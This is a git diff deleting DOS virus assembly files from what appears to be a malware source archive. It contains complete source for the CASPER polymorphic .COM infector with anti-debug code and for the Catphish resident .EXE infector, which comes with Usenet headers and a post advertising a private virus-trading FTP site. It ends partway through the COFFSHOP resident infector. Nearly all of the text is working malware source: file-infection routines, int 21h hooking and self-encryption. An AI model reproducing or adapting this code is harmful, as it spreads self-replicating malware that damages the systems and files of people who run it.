84h, 0C5h, 0D7h, 0D7h, 0CCh, 0D3h - db 0D0h, 0C9h, 90h, 84h, 0DDh, 0D3h - db 0D9h, 0C4h, 0DAh, 0C9h, 84h, 0D0h - db 0D3h, 0D7h, 0D8h, 9Eh, 84h, 0D7h - db 0C5h, 0DDh, 84h, 0A6h, 0DDh, 0C9h - db 84h, 0D8h, 0D3h, 84h, 0DDh, 0D3h - db 0D9h, 0D6h, 84h, 0A6h, 0C5h, 0D0h - db 0D0h, 0D7h, 84h, 92h, 92h, 92h - db 6Eh, 71h, 88h, 0CDh, 20h, 0 - -seg_a ends - - - - end start diff --git a/c/CASPER (36).ASM b/c/CASPER (36).ASM deleted file mode 100755 index e157a0b..0000000 --- a/c/CASPER (36).ASM +++ /dev/null @@ -1,776 +0,0 @@ -; -; -; Copyright (C) Mark Washburn, 1990. All Rights Reserved -; -; -; Inquires are directed to : -; Mark Washburn -; 4656 Polk Street NE -; Columbia Heights, MN 55421 -; USA -; -; -; -; -code segment public 'CODE' - org 100h -; - assume cs:code,ds:code,es:code -; - -;stopdebug equ 1 ; define this for disassembly trap code -int1vec equ 4 -int3vec equ 12 -; -dta_ptr equ -4 -file_crea equ -8 -file_attr equ -10 -path_start_ptr equ -12 -file_start_ptr equ -14 -RAND_SEED equ -16 -ptr1 equ -18 ; pointer to start of loop code -ptr2 equ -20 ; save data_begin pointer -dat1 equ -22 ; the random code used -dat2 equ -24 ; the decode length plus random length offset, max_msk - ; to make the decode routine more difficult to detect -dat3 equ -26 ; the 'necessary crypt code' mask -; -IFNDEF stopdebug -local_stack equ 26 -max_msk equ 0ffh ; this determines the maximum variance of length -ELSE -nobugptr equ -28 -oldint3 equ -32 -oldint1 equ -36 -local_stack equ 36 -max_msk equ 0ffh ; this determines the maximum variance of length -ENDIF -; -; -; -doscall macro call_type - ifnb - mov ah, call_type - endif - int 21h - endm -; -setloc macro arg1,reg2 - mov [bp + arg1],reg2 - endm -; -getloc macro reg1,arg2 - mov reg1,[bp + arg2] - endm -; -setdat macro arg1,reg2 - mov [si + offset arg1 - offset data_begin],reg2 - endm -; -getdat macro reg1,arg2 - mov reg1,[si + offset arg2 - offset data_begin] - endm -; -regofs macro reg1,arg2 - mov reg1,si - add reg1,offset (arg2 - data_begin) - endm -; -NOBUG1 macro -IFDEF stopdebug - INT 3 - NOP -ENDIF - endm -; -nobug2 macro -IFDEF stopdebug - INT 3 -ENDIF - endm -; -; -start: - jmp entry -; -; -; - MOV AH,0 - INT 021h ; program code -; db 600h-6 dup (0) -; insert utility code here -; -entry: - - -IFDEF stopdebug - call precrypt - db 36 dup (090h) ; calculated length of offset(t41-t10) -ELSE - db 39 dup (090h) ; calculated length of offset(t41-t10) -ENDIF -; -; label the start of encoded section -entry2: - - - - - - -INCLUDE utility.asm <------- Manipulation Task Goes Here! - - - - - - - - mov bp,sp ; allocate locals - sub sp,local_stack -; - push cx -movcmd: ; this label is used to locate the next instruction - mov dx,offset data_begin - setloc ptr2,dx ; save - will be modified in 'gencode' -IFDEF stopdebug -; -; save interrupt 1 and 3 vectors -; - push ds - mov ax,0 - push ax - pop ds - cli - mov ax,ds:[int1vec] - setloc oldint1,ax - mov ax,ds:[int1vec+2] - setloc oldint1+2,ax - mov ax,ds:[int3vec] - setloc oldint3,ax - mov ax,ds:[int3vec+2] - setloc oldint3+2,ax - sti - pop ds -; - call bugon -ENDIF - mov si,dx - add si,(offset old_code - offset data_begin) - mov di,0100h - mov cx,03h - cld - repz movsb - mov si,dx - doscall 30h ; check DOS version - cmp al,0 - NOBUG1 ; 0 - jnz cont1 ; DOS > 2.0 - jmp exit -cont1: - push es - doscall 2fh ; get program DTA - NOBUG1 ; 0 - setloc dta_ptr,bx - NOBUG1 ; 0 - setloc dta_ptr+2,es - pop es - regofs dx,my_dta - doscall 1ah ; set new DTA - push es - push si - mov es,ds:[02ch] ; environment address - mov di,0 -loop1: - pop si - push si - add si,(offset path_chars - offset data_begin) - lodsb - mov cx,8000h - repnz scasb - mov cx,4 -loop2: - lodsb - scasb - jnz loop1 - loop loop2 - pop si - pop es - setloc path_start_ptr,di - mov bx,si - add si,offset (file_name-data_begin) - mov di,si - jmp cont6 - nobug2 -next_path: - cmp word ptr [bp + path_start_ptr],0 - jnz cont3 - jmp exit2 - nobug2 -cont3: - push ds - push si - mov ds,es:[002ch] - - mov di,si - mov si,es:[bp+path_start_ptr] - add di,offset (file_name-data_begin) -loop3: - lodsb - cmp al,';' ; 3bh - jz cont4 - cmp al,0 - jz cont5 - stosb - jmp loop3 - nobug2 -cont5: - mov si,0 -cont4: - pop bx - pop ds - mov [bp+path_start_ptr],si - cmp ch,0ffh - jz cont6 - mov al,'\' ; 5ch - stosb -cont6: - mov [bp+file_start_ptr],di - mov si,bx - add si,(offset com_search-offset data_begin) - mov cx,6 - repz movsb - mov si,bx - mov ah,04eh - regofs dx,file_name - mov cx,3 - doscall - jmp cont7 - nobug2 -next_file: - doscall 04fh -cont7: - jnb cont8 - jmp next_path - nobug2 -cont8: - mov ax,[si+offset(my_dta-data_begin)+016h] ; low time byte - and al,01fh - cmp al,01fh - jz next_file -IFNDEF stopdebug - cmp word ptr [si+offset(my_dta-data_begin)+01ah],0fa00h - ; file length compared; need 1.5 k spare, see rnd off -ELSE - cmp word ptr [si+offset(my_dta-data_begin)+01ah],0f800h -ENDIF - jz next_file ; with virus length - cmp word ptr [si+offset(my_dta-data_begin)+01ah],0ah - ; file to short - jz next_file - mov di,[bp+file_start_ptr] - push si - add si,offset(my_dta-data_begin+01eh) -move_name: - lodsb - stosb - cmp al,0 - jnz move_name - pop si - mov ax,04300h - regofs dx,file_name - doscall - setloc file_attr,cx - mov ax,04301h - and cx,0fffeh - regofs dx,file_name - doscall - mov ax,03d02h - regofs dx,file_name - doscall - jnb cont9 - jmp exit3 - nobug2 -cont9: - mov bx,ax - mov ax,05700h - doscall - setloc file_crea,cx - setloc file_crea+2,dx -cont10: - mov ah,3fh - mov cx,3 - regofs dx,old_code - doscall - NOBUG1 ; 1 - jb cont98 - NOBUG1 - cmp ax,3 - NOBUG1 - jnz cont98 - NOBUG1 - mov ax,04202h - NOBUG1 ;1 - mov cx,0 - mov dx,0 - doscall - jnb cont99 -cont98: - jmp exit4 -cont99: - NOBUG1 ; 2 - push bx ; save file handle - NOBUG1 - mov cx,ax - push cx - NOBUG1 - sub ax,3 - NOBUG1 - setdat jump_code+1,ax - add cx,(offset data_begin-offset entry+0100h) - NOBUG1 - mov di,si - NOBUG1 - sub di,offset data_begin-offset movcmd-1 - NOBUG1 - mov [di],cx -; - doscall 02ch ; seed the random number generator - xor dx,cx - NOBUG1 - setloc rand_seed,dx - NOBUG1 ; 2 - call random - NOBUG1 ; 3 - getloc ax,rand_seed - NOBUG1 ; 3 - and ax,max_msk ; add a random offset to actual length - NOBUG1 ; 3 - add ax,offset (data_end-entry2) ; set decode length - NOBUG1 ; 3 - setloc dat2,ax ; save the decode length - NOBUG1 ; 3 - setdat (t13+1),ax ; set decode length in 'mov cx,xxxx' - pop cx ; restore the code length of file to be infected - NOBUG1 ; 3 - add cx,offset (entry2-entry+0100h) ; add the length - ; of uncoded area plus file offset - setdat (t11+1),cx ; set decode begin in 'mov di,xxxx' - NOBUG1 ; 3 - call random - getloc ax,rand_seed - NOBUG1 ; 3 - setloc dat1,ax ; save this random key in dat1 - setdat (t12+1),ax ; set random key in 'mov ax,xxxx' - NOBUG1 ; 3 - mov di,si - NOBUG1 ; 3 - sub di,offset (data_begin-entry) - NOBUG1 ; 3 - mov bx,si - add bx,offset (l11-data_begin) ; table L11 address - mov word ptr [bp+dat3],000000111b ; required routines - call gen2 ; generate first part of decrypt - setloc ptr1,di ; save the current counter to resolve 'loop' - add bx,offset (l21-l11) ; add then next tables' offset - NOBUG1 ; 3 - mov word ptr [bp+dat3],010000011b ; required plus 'nop' - NOBUG1 ; 3 - call gen2 ; generate second part of decrypt - add bx,offset (l31-l21) ; add the next offset - NOBUG1 - call gen2 ; generate third part of decrypt - mov cx,2 ; store the loop code - getloc si,ptr2 - NOBUG1 ; 3 - add si,offset (t40-t10) ; point to the code - repz movsb ; move the code - getloc ax,ptr1 ; the loop address pointer - sub ax,di ; the current address - dec di ; point to the jump address - stosb ; resolve the jump -; fill in the remaining code -l991: - getloc cx,ptr2 ; get the data_begin pointer - sub cx,offset (data_begin-entry2) ; locate last+1 entry - cmp cx,di ; are we there yet? - je l992 ; if not then fill some more space - mov dx,0h ; any code is ok - call gencode ; generate the code - jmp l991 - nobug2 -l992: - getloc si,ptr2 ; restore si to point to data area ; - push si - mov di,si - NOBUG1 ; 4 - mov cx,offset(end1-begin1) ; move code - add si,offset(begin1-data_begin) - NOBUG1 ; 4 - add di,offset(data_end-data_begin+max_msk) ; add max_msk - mov dx,di ; set subroutine start - repz movsb ; move the code - pop si - pop bx ; restore handle - call setrtn ; find this address - add ax,06h ; <- the number necessary for proper return - push ax - jmp dx ; continue with mask & write code -; continue here after return from mask & write code - NOBUG1 ; 4 - jb exit4 - cmp ax,offset(data_end-entry) - NOBUG1 ; 4 - jnz exit4 - mov ax,04200h - mov cx,0 - mov dx,0 - doscall - jb exit4 - mov ah,040h - mov cx,3 - NOBUG1 ; 4 - regofs dx,jump_code - doscall -exit4: - getloc dx,file_crea+2 - getloc cx,file_crea - and cx,0ffe0h - or cx,0001fh - mov ax,05701h - doscall - doscall 03Eh ; close file -exit3: - mov ax,04301h - getloc cx,file_attr - regofs dx,file_name - doscall -exit2: - push ds - getloc dx,dta_ptr - getloc ds,dta_ptr+2 - doscall 01ah - pop ds -exit: - pop cx - xor ax,ax - xor bx,bx - xor dx,dx - xor si,si - mov sp,bp ; deallocate locals - mov di,0100h - push di -IFDEF stopdebug - call bugoff -ENDIF - ret -; -; common subroutines -; -; -random proc near -; - getloc cx,rand_seed ; get the seed - xor cx,813Ch ; xor random pattern - add cx,9248h ; add random pattern - ror cx,1 ; rotate - ror cx,1 ; three - ror cx,1 ; times. - setloc rand_seed,cx ; put it back - and cx,7 ; ONLY NEED LOWER 3 BITS - push cx - inc cx - xor ax,ax - stc - rcl ax,cl - pop cx - ret ; return -; -random endp -; -setrtn proc near -; - pop ax ; ret near - push ax - ret -; -setrtn endp -; -gencode proc near -; -l999: - call random - test dx,ax ; has this code been used yet? - jnz l999 ; if this code was generated - try again - or dx,ax ; set the code as used in dx - mov ax,cx ; the look-up index - sal ax,1 - push ax - xlat - mov cx,ax ; the count of instructions - pop ax - inc ax - xlat - add ax,[bp+ptr2] ; ax = address of code to be moved - mov si,ax - repz movsb ; move the code into place - ret -; -gencode endp -; -gen2 proc near -; - mov dx,0h ; used code -l990: - call gencode - mov ax,dx ; do we need more code - and ax,[bp+dat3] ; the mask for the required code - cmp ax,[bp+dat3] - jne l990 ; if still need required code - loop again - ret -; -gen2 endp -; -IFDEF stopdebug -doint3: - push bx - mov bx,sp - push ax - push si - mov si,word ptr [bx+02] - inc word ptr [bx+02] ; point to next address - setloc nobugptr,si - lodsb ; get the byte following int 3 - xor byte ptr [si],al - mov al,[bx+7] ; set the trap flag - or al,1 - mov [bx+7],al - pop si - pop ax - pop bx - iret -; -doint1: - push bx - mov bx,sp - push ax - push si - getloc si,nobugptr - lodsb - xor byte ptr [si],al - mov al,[bx+7] ; clear the trap flag - and al,0feh - mov [bx+7],al - pop si - pop ax - pop bx -bugiret: - iret -; -bugon: - pushf - push ds - push ax - mov ax,0 - push ax - pop ds - getloc ax,ptr2 - sub ax,offset(data_begin-doint3) - cli - mov ds:[int3vec],ax - getloc ax,ptr2 - sub ax,offset(data_begin-doint1) - mov ds:[int1vec],ax - push cs - pop ax - mov ds:[int1vec+2],ax - mov ds:[int3vec+2],ax - sti - pop ax - pop ds - popf - ret -; -bugoff: - pushf - push ds - push ax - mov ax,0 - push ax - pop ds - - getloc ax,oldint3 - cli - mov ds:[int3vec],ax - getloc ax,oldint1 - mov ds:[int1vec],ax - getloc ax,oldint1+2 - mov ds:[int1vec+2],ax - getloc ax,oldint3+2 - mov ds:[int3vec+2],ax - sti - - pop ax - pop ds - popf - ret -; -ENDIF -; -; -; the data area -; -data_begin label near -; -T10 LABEL NEAR -T11: MOV DI,0FFFFH -T12: MOV AX,0FFFFH -T13: MOV CX,0FFFFH -T14: CLC -T15: CLD -T16: INC SI -T17: DEC BX -T18: NOP -T19 LABEL NEAR -; -T20 LABEL NEAR -T21: XOR [DI],AX -T22: XOR [DI],CX -T23: XOR DX,CX -T24: XOR BX,CX -T25: SUB BX,AX -T26: SUB BX,CX -T27: SUB BX,DX -T28: NOP -T29 LABEL NEAR -; -T30 LABEL NEAR -T31: INC AX -T32: INC DI -T33: INC BX -T34: INC SI -T35: INC DX -T36: CLC -T37: DEC BX -T38: NOP -T39 LABEL NEAR -; -T40: LOOP T20 -T41 LABEL NEAR -; -L11: DB OFFSET (T12-T11),OFFSET (T11-data_begin) -L12: DB OFFSET (T13-T12),OFFSET (T12-data_begin) -L13: DB OFFSET (T14-T13),OFFSET (T13-data_begin) -L14: DB OFFSET (T15-T14),OFFSET (T14-data_begin) -L15: DB OFFSET (T16-T15),OFFSET (T15-data_begin) -L16: DB OFFSET (T17-T16),OFFSET (T16-data_begin) -L17: DB OFFSET (T18-T17),OFFSET (T17-data_begin) -L18: DB OFFSET (T19-T18),OFFSET (T18-data_begin) -; -L21: DB OFFSET (T22-T21),OFFSET (T21-data_begin) -L22: DB OFFSET (T23-T22),OFFSET (T22-data_begin) -L23: DB OFFSET (T24-T23),OFFSET (T23-data_begin) -L24: DB OFFSET (T25-T24),OFFSET (T24-data_begin) -L25: DB OFFSET (T26-T25),OFFSET (T25-data_begin) -L26: DB OFFSET (T27-T26),OFFSET (T26-data_begin) -L27: DB OFFSET (T28-T27),OFFSET (T27-data_begin) -L28: DB OFFSET (T29-T28),OFFSET (T28-data_begin) -; -L31: DB OFFSET (T32-T31),OFFSET (T31-data_begin) -L32: DB OFFSET (T33-T32),OFFSET (T32-data_begin) -L33: DB OFFSET (T34-T33),OFFSET (T33-data_begin) -L34: DB OFFSET (T35-T34),OFFSET (T34-data_begin) -L35: DB OFFSET (T36-T35),OFFSET (T35-data_begin) -L36: DB OFFSET (T37-T36),OFFSET (T36-data_begin) -L37: DB OFFSET (T38-T37),OFFSET (T37-data_begin) -L38: DB OFFSET (T39-T38),OFFSET (T38-data_begin) -; -; -; -; this routine is relocated after the end of data area -; this routine encrypts, writes, and decrypts the virus code -; -begin1: - getloc cx,dat2 ; get off (data_end-entry2) plus max_msk - getloc ax,dat1 ; get decode ket - mov di,si ; and set the begin encrypt address - sub di,offset (data_begin-entry2) - call crypt - mov ah,040h - mov cx,offset data_end-offset entry - mov dx,si - sub dx,offset data_begin-offset entry - doscall - pushf ; save the status of the write - push ax - getloc cx,dat2 ; get off (data_end-entry2) plus max_msk - getloc ax,dat1 - mov di,si - sub di,offset (data_begin-entry2) - call crypt - pop ax ; restore the DOS write's status - popf - ret -; -crypt: - xor [di],ax - xor [di],cx - inc ax - inc di - loop crypt - ret -end1: -; -; global work space and constants -; -old_code: db 090h,090h,090h -jump_code: db 0e9h,0,0 -com_search: db '*.COM',0 -path_chars: db 'PATH=' -file_name: db 40h DUP (0) -my_dta: db 2Bh DUP (0) - db 0,0,0 - -data_end label near -IFDEF stopdebug -; -scan_bytes db 0CCh,090h -; -precrypt: - mov bp,sp ; allocate locals - sub sp,local_stack - doscall 02ch ; seed the random number generator - xor dx,cx - setloc rand_seed,dx - call random - mov di,offset start - push ds - pop es -lp999: - mov cx,08000h - mov si,offset scan_bytes - lodsb - repnz scasb - cmp cx,0 - je done998 - cmp di,offset data_end - jge done998 - lodsb - scasb - jnz lp999 - call random - getloc ax,rand_seed - dec di - mov [di],al - inc di - xor [di],al - inc di ; skip the masked byte - jmp short lp999 -done998: - mov sp,bp - ret -ENDIF - -code ends - end start - \ No newline at end of file diff --git a/c/CATPHISH (37).ASM b/c/CATPHISH (37).ASM deleted file mode 100755 index a8632e1..0000000 --- a/c/CATPHISH (37).ASM +++ /dev/null @@ -1,552 +0,0 @@ -From smtp Sun Jan 29 16:25 EST 1995 -Received: from ids.net by POBOX.jwu.edu; Sun, 29 Jan 95 16:25 EST -Date: Sun, 29 Jan 1995 16:18:52 -0500 (EST) -From: ids.net!JOSHUAW (JOSHUAW) -To: pobox.jwu.edu!joshuaw -Content-Length: 11874 -Content-Type: text -Message-Id: <950129161852.10074@ids.net> -Status: RO - -To: joshuaw@pobox.jwu.edu -Subject: (fwd) CATPHISH.ASM -Newsgroups: alt.comp.virus - -Path: paperboy.ids.net!uunet!cs.utexas.edu!uwm.edu!msunews!news.mtu.edu!news.mtu.edu!not-for-mail -From: jdmathew@mtu.edu (Icepick) -Newsgroups: alt.comp.virus -Subject: CATPHISH.ASM -Date: 26 Jan 1995 13:06:15 -0500 -Organization: Michigan Technological University -Lines: 486 -Message-ID: <3g8oan$54g@maxwell11.ee> -NNTP-Posting-Host: maxwell11.ee.mtu.edu -X-Newsreader: TIN [version 1.2 PL1] - - - -name VIRUSTEST - title -code segment - assume cs:code, ds:code, es:code - org 100h - -;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -; The Catphish Virus. -; -; The Catphish virus is a resident .EXE infector. -; Size: 678 bytes (decimal). -; No activation (bomb). -; Saves date and file attributes. -; -; If assembling, check_if_resident jump must be marked over -; with nop after first execution (first execution will hang -; system). -; -; *** Source is made available to learn from, not to -; change author's name and claim credit! *** - -start: - call setup ; Find "delta offset". -setup: - pop bp - sub bp, offset setup-100h - jmp check_if_resident ; See note above about jmp! - -pre_dec_em: - mov bx,offset infect_header-100h - add bx,bp - mov cx,endcrypt-infect_header - -ror_em: - mov dl,byte ptr cs:[bx] - ror dl,1 ; Decrypt virus code - mov byte ptr cs:[bx],dl ; by rotating right. - inc bx - loop ror_em - - jmp check_if_resident - -;--------------------------------- Infect .EXE header ----------------------- -; The .EXE header modifying code below is my reworked version of -; Dark Angel's code found in his Phalcon/Skism virus guides. - - -infect_header: - push bx - push dx - push ax - - - - mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs - ; ^---make sure you don't destroy the file handle - mov cl, 4 ; Multiply by 16. Won't - shl bx, cl ; work with headers > 4096 - ; bytes. Oh well! - sub ax, bx ; Subtract header size from - sbb dx, 0 ; file size - ; Now DX:AX is loaded with file size minus header size - mov cx, 10h ; DX:AX/CX = AX Remainder DX - div cx - - - mov word ptr [buffer+14h-100h], dx ; IP Offset - mov word ptr [buffer+16h-100h], ax ; CS Displacement in module - - - mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS - mov word ptr [buffer+10h-100h], 0A000h ; Starting SP - - pop ax - pop dx - - add ax, endcode-start ; add virus size - cmp ax, endcode-start - jb fix_fault - jmp execont - - -war_cry db 'Cry Havoc, and let slip the Dogs of War!',0 -v_name db '[Catphish]',0 ; Virus name. -v_author db 'FirstStrike',0 ; Me. -v_stuff db 'Kraft!',0 - - -fix_fault: - add dx,1d - -execont: - push ax - mov cl, 9 - shr ax, cl - ror dx, cl - stc - - adc dx, ax - pop ax - and ah, 1 - - - mov word ptr [buffer+4-100h], dx ; Fix-up the file size in - mov word ptr [buffer+2-100h], ax ; the EXE header. - - pop bx - retn ; Leave subroutine - -;---------------------------------------------------------------------------- - - -check_if_resident: - push es - xor ax,ax - mov es,ax - - cmp word ptr es:[63h*4],0040h ; Check to see if virus - jnz grab_da_vectors ; is already resident - jmp exit_normal ; by looking for a 40h - ; signature in the int 63h - ; offset section of - ; interrupt table. - -grab_da_vectors: - - mov ax,3521h ; Store original int 21h - int 21h ; vector pointer. - mov word ptr cs:[bp+dos_vector-100h],bx - mov word ptr cs:[bp+dos_vector+2-100h],es - - - -load_high: - push ds - -find_chain: ; Load high routine that - ; uses the DOS internal - mov ah,52h ; table function to find - int 21h ; start of MCB and then - ; scales up chain to - mov ds,es: word ptr [bx-2] ; find top. (The code - assume ds:nothing ; is long, but it is the - ; only code that would - xor si,si ; work when an infected - ; .EXE was to be loaded -Middle_check: ; into memory. - - cmp byte ptr ds:[0],'M' - jne Check4last - -add_one: - mov ax,ds - add ax,ds:[3] - inc ax - - mov ds,ax - jmp Middle_check - -Check4last: - cmp byte ptr ds:[0],'Z' - jne Error - mov byte ptr ds:[0],'M' - sub word ptr ds:[3],(endcode-start+15h)/16h+1 - jmp add_one - -error: - mov byte ptr ds:[0],'Z' - mov word ptr ds:[1],008h - mov word ptr ds:[3],(endcode-start+15h)/16h+1 - - push ds - pop ax - inc ax - push ax - pop es - - - - - -move_virus_loop: - mov bx,offset start-100h ; Move virus into carved - add bx,bp ; out location in memory. - mov cx,endcode-start - push bp - mov bp,0000h - -move_it: - mov dl, byte ptr cs:[bx] - mov byte ptr es:[bp],dl - inc bp - inc bx - loop move_it - pop bp - - - -hook_vectors: - - mov ax,2563h ; Hook the int 21h vector - mov dx,0040h ; which means it will - int 21h ; point to virus code in - ; memory. - mov ax,2521h - mov dx,offset virus_attack-100h - push es - pop ds - int 21h - - - - - pop ds - - - -exit_normal: ; Return control to - pop es ; infected .EXE - mov ax, es ; (Dark Angle code.) - add ax, 10h - add word ptr cs:[bp+OrigCSIP+2-100h], ax - - cli - add ax, word ptr cs:[bp+OrigSSSP+2-100h] - mov ss, ax - mov sp, word ptr cs:[bp+OrigSSSP-100h] - sti - - xor ax,ax - xor bp,bp - -endcrypt label byte - - db 0eah -OrigCSIP dd 0fff00000h -OrigSSSP dd ? - -exe_attrib dw ? -date_stamp dw ? -time_stamp dw ? - - - -dos_vector dd ? - -buffer db 18h dup(?) ; .EXE header buffer. - - - - -;---------------------------------------------------------------------------- - - -virus_attack proc far - assume cs:code,ds:nothing, es:nothing - - - cmp ax,4b00h ; Infect only on file - jz run_kill ; executions. - -leave_virus: - jmp dword ptr cs:[dos_vector-100h] - - - -run_kill: - call infectexe - jmp leave_virus - - - - - -infectexe: ; Same old working horse - push ax ; routine that infects - push bx ; the selected file. - push cx - push es - push dx - push ds - - - - mov cx,64d - mov bx,dx - -findname: - cmp byte ptr ds:[bx],'.' - jz o_k - inc bx - loop findname - -pre_get_out: - jmp get_out - -o_k: - cmp byte ptr ds:[bx+1],'E' ; Searches for victims. - jnz pre_get_out - cmp byte ptr ds:[bx+2],'X' - jnz pre_get_out - cmp byte ptr ds:[bx+3],'E' - jnz pre_get_out - - - - -getexe: - mov ax,4300h - call dosit - - mov word ptr cs:[exe_attrib-100h],cx - - mov ax,4301h - xor cx,cx - call dosit - -exe_kill: - mov ax,3d02h - call dosit - xchg bx,ax - - mov ax,5700h - call dosit - - mov word ptr cs:[time_stamp-100h],cx - mov word ptr cs:[date_stamp-100h],dx - - - - push cs - pop ds - - mov ah,3fh - mov cx,18h - mov dx,offset buffer-100h - call dosit - - cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker - jnz infectforsure ; of 1993h in .EXE - jmp close_it ; header checksum - ; position. -infectforsure: - call move_f_ptrfar - - push ax - push dx - - - call store_header - - pop dx - pop ax - - call infect_header - - - push bx - push cx - push dx - - - mov bx,offset infect_header-100h - mov cx,(endcrypt)-(infect_header) - -rol_em: ; Encryption via - mov dl,byte ptr cs:[bx] ; rotating left. - rol dl,1 - mov byte ptr cs:[bx],dl - inc bx - loop rol_em - - pop dx - pop cx - pop bx - - mov ah,40h - mov cx,endcode-start - mov dx,offset start-100h - call dosit - - - mov word ptr cs:[buffer+12h-100h],1993h - - - call move_f_ptrclose - - mov ah,40h - mov cx,18h - mov dx,offset buffer-100h - call dosit - - mov ax,5701h - mov cx,word ptr cs:[time_stamp-100h] - mov dx,word ptr cs:[date_stamp-100h] - call dosit - -close_it: - - - mov ah,3eh - call dosit - -get_out: - - - pop ds - pop dx - -set_attrib: - mov ax,4301h - mov cx,word ptr cs:[exe_attrib-100h] - call dosit - - - pop es - pop cx - pop bx - pop ax - - retn - -;---------------------------------- Call to DOS int 21h --------------------- - -dosit: ; DOS function call code. - pushf - call dword ptr cs:[dos_vector-100h] - retn - -;---------------------------------------------------------------------------- - - - - - - - - - - -;-------------------------------- Store Header ----------------------------- - -store_header: - les ax, dword ptr [buffer+14h-100h] ; Save old entry point - mov word ptr [OrigCSIP-100h], ax - mov word ptr [OrigCSIP+2-100h], es - - les ax, dword ptr [buffer+0Eh-100h] ; Save old stack - mov word ptr [OrigSSSP-100h], es - mov word ptr [OrigSSSP+2-100h], ax - - retn - -;--------------------------------------------------------------------------- - - - - - - -;---------------------------------- Set file pointer ------------------------ - -move_f_ptrfar: ; Code to move file pointer. - mov ax,4202h - jmp short move_f - -move_f_ptrclose: - mov ax,4200h - -move_f: - xor dx,dx - xor cx,cx - call dosit - retn - -;---------------------------------------------------------------------------- - - -endcode label byte - -endp - -code ends -end start - -From smtp Fri Jan 27 13:23 EST 1995 -Received: from ids.net by POBOX.jwu.edu; Fri, 27 Jan 95 13:23 EST -Date: Fri, 27 Jan 1995 13:21:38 -0500 (EST) -From: ids.net!JOSHUAW (JOSHUAW) -To: pobox.jwu.edu!joshuaw -Content-Length: 1179 -Content-Type: binary -Message-Id: <950127132138.b52b@ids.net> -Status: RO - -To: joshuaw@pobox.jwu.edu -Subject: (fwd) Private Virii FTP Site -Newsgroups: alt.comp.virus - -Path: paperboy.ids.net!uunet!nntp.crl.com!crl12.crl.com!not-for-mail -From: yojimbo@crl.com (Douglas Mauldin) -Newsgroups: alt.comp.virus -Subject: Private Virii FTP Site -Date: 24 Jan 1995 22:01:53 -0800 -Organization: CRL Dialup Internet Access (415) 705-6060 [Login: guest] -Lines: 14 -Message-ID: <3g4pgh$ka2@crl12.crl.com> -NNTP-Posting-Host: crl12.crl.com -X-Newsreader: TIN [version 1.2 PL2] - -I run THe QUaRaNTiNE, a private FTP site for viral reseachers/coders. I'm -always on the lookout for new viral material. If you'd like access, or -like to trade, email me a list of your collection. - -Serious inquiries only. - - -- - -- - - - Yojimbo [] Fast as the Wind - SysOp: The Dojo BBS Quiet as the Forest - 1.7i3.436.1795 Aggressive as Fire - QUaRaNTiNE HomeSite And - THe ULTiMaTE ViRaL InFeCTiON Immovable as a Mountain - - - - - diff --git a/c/COFFSHOP (43).ASM b/c/COFFSHOP (43).ASM deleted file mode 100755 index 323049f..0000000 --- a/c/COFFSHOP (43).ASM +++ /dev/null @@ -1,1662 +0,0 @@ - .RADIX 16 - - -_TEXT segment - - assume cs:_TEXT, ds:_TEXT - - -VERSION equ 3 -PICLEN equ last - beeld ;length of picture routine -FILELEN equ last - first ;length of virus -FILEPAR equ (FILELEN + 0F)/10 ;length of virus in paragraphs -VIRPAR equ 00D0 ;space for resident virus -WORKPAR equ 0160 ;work space for engine -STACKOFF equ 1000 ;Stack offset -DATAPAR equ 0050 ;extra memory allocated -BUFLEN equ 1C ;length of buffer - - -;**************************************************************************** -;* data area for virus -;**************************************************************************** - - org 00E0 - -mutstack dw 0, 0 -oldlen dw 0, 0 -oi21 dw 0, 0 -minibuf db 0, 0, 0, 0 - - -;**************************************************************************** -;* data area for engine -;**************************************************************************** - -add_val dw 0 -xor_val dw 0 -xor_offset dw 0 -where_len dw 0 -where_len2 dw 0 -flags db 0 - - -;****************************************************************************** -;* Begin of virus, installation in memory -;****************************************************************************** - - org 0100 - -first: call next ;get IP -next: pop si - - sub si,low 3 ;SI = begin virus - mov di,0100 - cld - - push ax ;save registers - push ds - push es - push di - push si - - mov ah,30 ;DOS version >= 3.1? - int 21 - xchg ah,al - cmp ax,030A - jb not_install - - mov ax,33DA ;already resident? - int 21 - cmp ah,0A5 - je not_install - - mov ax,es ;adjust memory-size - dec ax - mov ds,ax - xor bx,bx - cmp byte ptr [bx],5A - jne not_install - mov ax,[bx+3] - sub ax,(VIRPAR+WORKPAR) - jb not_install - mov [bx+3],ax - sub word ptr ds:[bx+12],(VIRPAR+WORKPAR) - - mov es,[bx+12] ;copy program to top - push cs - pop ds - mov cx,FILELEN - rep movsb - - push es - pop ds - - mov ax,3521 ;get original int21 vector - int 21 - mov ds:[oi21],bx - mov ds:[oi21+2],es - - mov dx,offset ni21 ;install new int21 handler - mov ax,2521 - int 21 - - mov ax,33DBh ;init. random nr. generator - int 21 - - mov ah,2A ;ask date - int 21 - cmp al,5 ;friday ? - jne not_install - mov ah,2C ;ask time - int 21 - or dh,dh ;sec = 0 ? - jnz not_install - - mov ax,33DC ;show picture - int 21 - -not_install: pop si ;restore registers - pop di - pop es - pop ds - pop ax - - add si,(offset buffer) - sub si,di - cmp byte ptr cs:[si],4Dh ;COM or EXE ? - je entryE - -entryC: push di - mov cx,BUFLEN - rep movsb - ret - -entryE: mov bx,ds ;calculate CS - add bx,low 10 - mov cx,bx - add bx,cs:[si+0E] - cli ;restore SS and SP - mov ss,bx - mov sp,cs:[si+10] - sti - add cx,cs:[si+16] - push cx ;push new CS on stack - push cs:[si+14] ;push new IP on stack - db 0CBh ;retf - - -;****************************************************************************** -;* Interupt 24 handler -;****************************************************************************** - -ni24: mov al,3 ;to avoid 'Abort, Retry, ...' - iret - - -;****************************************************************************** -;* Interupt 21 handler -;****************************************************************************** - -ni21: pushf - - cmp ax,33DA ;install-check ? - jne not_ic - mov ax,0A500+VERSION ;return a signature - popf - iret - -not_ic: push es ;save registers - push ds - push si - push di - push dx - push cx - push bx - push ax - - cmp ax,33DBh ;rnd init ? - jne not_ri - call rnd_init - jmp short no_infect - -not_ri: cmp ax,33DC ;show picture? - je show_pic - -not_pi: cmp ax,4B00 ;execute ? - je do_it - - cmp ax,6C00 ;open DOS 4.0+ ? - jne no_infect - test bl,3 - jnz no_infect - mov dx,di - -do_it: call infect - -no_infect: pop ax ;restore registers - pop bx - pop cx - pop dx - 